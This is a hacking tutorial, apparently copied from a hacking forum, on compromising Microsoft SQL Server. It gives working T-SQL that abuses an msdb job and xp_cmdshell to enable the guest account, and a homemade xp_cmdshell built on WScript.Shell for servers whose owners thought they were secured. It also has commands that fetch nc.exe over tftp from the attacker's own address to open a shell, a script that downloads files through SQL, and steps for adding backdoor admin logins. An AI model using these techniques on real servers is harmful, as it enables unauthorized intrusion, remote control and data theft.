The Dirty SQL Tricks

Play online games at GameDuell.
New Training Titles for Audio Software, Hardware & Technical Skills.
Shockwave has the game Risk! Buy it now!
Join LinkShare Today!
SYNC Outlook and Files on all your Computers
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++
************************************************** *********************************************
*The Dirty SQL Tricks *
*Tutorial Written By: kd-team * *
*Creditz: www.sqlsecurity.com,www.sqlteam.com,governmentsecu rity.com,www.google.com *
*Special Creditz: Jockel , tian, xing *
*Use on youre own Risk. *
************************************************** *********************************************
0) Index
1) Tools Needed
2) Privilige Escalation
3) Removing Execute Acces on users
4) Making youre own xp_cmdshell (thx to Jockel for letting me put his tut in here)
5) Using SQL as a ftp client (thx to sqlteam.com for there great site)
6) SQL Accounts(Handy for decoy)

0) Index
This will probably be the last tutorial I write on sql security and things related with it.
Most of the other things are so case specific that they can’t be covered in a general tutorial.
Hope this can be usefull to you peeps also hope that my english has improves sinds my first tutorial.
The tutorial included in here about making youre own xp_cmdshell has been included after permission
to him and he giving it.

1) Tools Needed

- osql.exe
- sqlexec.exe (the green aple)
- a shell
- brains
- FTP_SQLTEAM.dll

2) Privilige Escalation

there are realtive enough papers on this subject so I will just give some code examples on how you can
do it.That would be enough to continue building on it. This probably won’t work if SP3+ is applied or
higher.

The example gives acces to xp_cmdshell and enables the windows guest account

USE msdb
EXEC sp_add_job @job_name = ‘ftp’,
@enabled = 1,
@description = ‘This will give a low privileged user access to xp_cmdshell’,
@delete_level = 1
EXEC sp_add_jobstep @job_name = ‘ftp’,
@step_name = ‘Exec my sql’,
@subsystem = ‘TSQL’,
@command = ‘exec master..xp_execresultset N’’select ””exec
master..xp_cmdshell ” net user guest /active:yes’””””,N”Master”’
EXEC sp_add_jobserver @job_name = ‘ftp’,
@server_name = ‘master’
EXEC sp_start_job @job_name = ‘ftp’

3) Removing Execute Acces on users

This is kinda easy just the following simple lines of codes usually.
We use DENY because it overrulez all acces granted from groups or role memberships.

DENY {permission} ON {tablename} TO {username}

DENY EXECUTE ON master… TO SA

4) Making youre own xp_cmdshell (thx to Jockel for letting me put his tut in here)
************************************************** ************************************************** *****
*Hacking Secured SQL Servers *
*Tutorial Written By: Jockel *
*Creditz: tian xing *
*Use on you’re own Risk. *
************************************************** ************************************************** *****

1) Index
2) Tools Needed
3) injecting own procedure
4) executing own procedure

1) Index
so this is a tut showing u how to “hack” so called secured mssql servers …
the only mehtod i know to really secure a mssql is denying execute rights for SA

2) Tools Needed
- A mssql server with username/password
- sqlbrowser.exe ( hxxp://www.timelink.cn/tianxing/files/SqlBrower.exe )
- other hack tools (nc.exe, tftp … )
- stored procedure ( hxxp://www.pstruh.cz/tips/detpg_cmdshell.htm )

3) injecting own procedure

First of all credits to tho this goes to the Jockel I only asked him permission to use it in my own
tutorial. Since this might come in handy.

so, download and fire up sqlbrowser.exe. on the right side of the pr0gg insert IP, username and password.
on the left side of the pr0gg is a text field called “SQL Server Command”
the default command at program strart is xp_cmdshell “dir c:\” wich is not working on a secured mssql.
so, we have to create our own procedure
goto hxxp://www.pstruh.cz/tips/detpg_cmdshell.htm and copy the stored procedure and paste it in the
command field.
next replace the function name xp_cmdshell with our own. for example “fn_makeUpdate”.
bbut that doesnt matter .. choose anything you want
well …
your command should look something like :

———————————————
CREATE PROCEDURE fn_makeUpdate(@cmd varchar(255), @Wait int = 0) AS
–Create WScript.Shell object
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int

EXECUTE @OLEResult = sp_OACreate ‘WScript.Shell’, @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR (’CreateObject %0X’, 14, 1, @OLEResult)

EXECUTE @OLEResult = sp_OAMethod @ShellID, ‘Run’, Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR (’Run %0X’, 14, 1, @OLEResult)
–If @OLEResult <> 0 EXEC sp_displayoaerrorinfo @ShellID, @OLEResult

EXECUTE @OLEResult = sp_OADestroy @ShellID

return @result
———————————————

next click on connect ..
as soon as you are conencted there are to possible responses :

- “bla bla did not return any results” means it worked goto point 2 =)
- other error means didn’t work

if error “EXECUTE” or “CREATE” permissions appears then this mssql is really secure !
goto next target …
if there’s a syntax error then resize the SQLBrowser window to full size !!
there should be no line brake in your function at the wrong position !!

4) executing own procedure
so when you successfully injected your funtion you can now execute it .. =)
so fire up tftp or ftp server and then execute :

tftp:
fn_makeUpdate “tftp.exe -i <yourIP> get nc.exe”

ftp:
fn_makeUpdate “cmd.exe /c echo open <yourIP> <yourPort> >temp”
…. blah blah
but you have to execute it line by line !!

so finally upload nc.exe und start listening …
the only problem you got getting in this way is that you don’t see the result’s you execute
you just see “0″ or “1″.
and if an error “8007000..” or something like this appears this means that the executable your
trying to execute does not exist on the host …
************************************************** ************************************************** *****

5) Using SQL as a ftp client

First of all credits to tho this goes to the SQL-TEAM I’ve only used there dll and script in here
and then tried to explain everything in my own words. I do NOT take any credits for this.

Why should this be handy? Well the answer to this is very simple.
Sometimes when you secure youre server so that tftp,ftp,net ain’t allowed you maybe still wan’t to be
able to transfer files. What could be better then doing it with SQL itself after having it al secured?
Well let’s get to work.

First of all with this tut there will be another rar included that holds the code below + a dll you need.
Little explanation how this works:

With sql you can manipulate and call object etc. So when you have a dll fro who you know it functions
it’s a peace of cake to make a object from it and use the dll to do stuff SQL wouldn’t be able to do
normally.
First you gotta upload the dll and register it:
Regsvr32.exe pathtodll\FTP_SQLTEAM.dll
After this is done you can just execute the script below.
The script below is a example script so you gotta change the adres and the file to get and the place where
it will be stored locally.
to execute the script you can do like(use the attached .sql for this purpose):
osql.exe -S 123.123.123.123 -U sa -P “” -i SQLTeam_ftp.sql

I won’t explain how to change the things belowe because of this beeing my last tutorial on sql
and I think that you all should now know ho to do this.
Just remember for each new file you want to download you must change the script.

************************************************** ************************************************** ****
/*
I’ve hard coded some of the values here in an effort to keep things simple.
You can make them parameters, such as server name, file name and location
in order to make your version more dynamic.
*/

–Create an instance of FTP Object
Set NoCount on
DECLARE @hr int –Holds error value for each sp_OA function
DECLARE @oPKG int –Holds the handle of the object
Declare @source varchar(255) –Hold error info
Declare @description varchar(255) –Hold error description
Declare @connected int –Hold the handle of the Internet session
declare @opened int –Hold the handle of the connection to the FTP Server
declare @getfile bit –Result of the success(1)/Failure(2) of the getfile operation

–First, we want to create the object and store it’s handle in @oPKG
EXEC @hr = sp_OACreate ‘FTP_SQLTeam.FTP_SQLDll’, @oPKG OUT

–Check for errors
IF @hr <> 0
BEGIN
PRINT ‘*** Create Package object failed’
EXEC sp_OAGetErrorInfo @oPKG, @source OUT, @description OUT
select @description ,@source
RETURN
END
–Establish our internet connection
– VB Equivalent=Open_Internet(”myftp”, 1, vbNullString, vbNullString, 0)
Exec @hr=sp_OAMethod @oPkg,Open_Internet,@opened Out,
@alias=’myftp’,
@accesstype=1,
@proxy=”",
@bypass=”",
@flags=0
–Check for errors
IF @hr <> 0
BEGIN
print ‘Error in Open Internet Method’
EXEC sp_oaGeterrorinfo @oPkg, @hr
RETURN
END

–Connect to the FTP Server(microsoft.com)
–vb Equivalent Connect_Internet(connected, “ftp.microsoft.com”, 0, “anonymous”, “graz@sqlteam.com”, 1, 0, 0)
Exec @hr=sp_OAMethod @oPkg,Connect_Internet,@Connected Out,
@handleid=@opened,
@server=’ftp.microsoft.com’,
@port=0,
@username=’anonymous’,
@pwd=’graz@sqlteam.com’,
@service=1,
@flags=0,
@context=0
–Check for errors
IF @hr <> 0
BEGIN
Print ‘Error in Connect Internet Method’
EXEC sp_oaGeterrorinfo @oPkg, @hr
RETURN
END

–Get the file and direct it to our local drive
–vb Equivalent Get_File(sessionid, remotefile, newfile, failifexists, flagsandattr, flags, context) As Boolean
Exec @hr=sp_OAMethod @oPkg,Get_File,@getfile OUT,
@sessionid=@Connected,
@remotefile=’/bussys/readme.txt’,
@newfile=’c:\msreadme.txt’,
@failifexists=0,
@flagsandattr=0,
@flags=1,
@context=0

–Check for errors
IF @hr <> 0
BEGIN
Print ‘Error in Get File Method’
EXEC sp_oaGeterrorinfo @oPkg, @hr
RETURN
END

–Since get file is boolean, we use a bit field to trap it’s return value
–if it’s 1(True) then the file came in correctly
–See if file was imorted successfully
if @getfile=1
begin
print ‘Imported Successfully’
End
–Pretty simple here, call the close method and pass it your
–Internet connection handle. If it returns
Exec @hr=sp_OAMethod @oPkg,Close_Internet,null,
@inethandle=@connected
–Check for errors
IF @hr <> 0
BEGIN
Print ‘Error in Close Internet Method’
EXEC sp_oaGeterrorinfo @oPkg, @hr
RETURN
END

Set NoCount off
************************************************** ************************************************** ****

6) SQL Accounts(Handy for decoy)

First of all I will give some information on user account on a SQL server then I will proceed to explain
how to make useraccount and give them some rights and as last I will just tell you how tis can be used as
somekind of decoy.

How do account work on a SQL server.
SQL servers have several ways on how you cna login to them and how tyou can set-up a useraccount.
mostly when installed on win2k+ servers the server can be installed in 2 ways:

windows only login
windows+SQL login

on Windows 98/me there is only 1 way it can be setup:

SQL login

YOu may hink what is the difference between those login modes. Well that can be explained. A sql server
when setup on mix mode(sql+win) login you can attach windows login or domains to the sql server. That
means that only people who have a account on windows it self can login to the sql server.When in SQL mode
only the people will be able to login to the sql server but not to windows.This is how unnecessary it seems
a rather important security aspect.Why you ask? well very simpel ones a attacker finds out that the login
he has bruteforced or just obtained from the sql server is also a windows account he can do a lot more
of damage then only with his sql account(even though with only a sql account you can do pretty much
dammage).
So hope this little explanation can be usefull in understanding a bit how som1 can authenticate himself
to a sql server.Just keep in mind that even though you can make logins to a sql server with windows
account you still WON’T be able to make windows account from a sql server.This was the very very basic
explanation of how it works but it is far more complicated if you also want to know about server roles
etc. If you are planning on getting deeper into sql then I suggest you buy a book on it.Beneath I will
explain how to make a sql user first and then how to add existing windows users to sql.

Now let’s continue with making sql accounts and giving them rights.

EXEC sp_addlogin ‘username’,'@passwd = ‘password’,@defdb = ‘Master’

EXEC sp_addlogin ‘Admin’,'@passwd = ‘fixed’,@defdb = ‘Master’

rights:
GRANT ALL ON Master TO Admin

Adding win32 users to sql

EXEC sp_grantlogin ‘Administrator’

Administrator MUST BE in the WIN NT user group. it has the rights of the win account.

(Captured From h4cky0u.pl)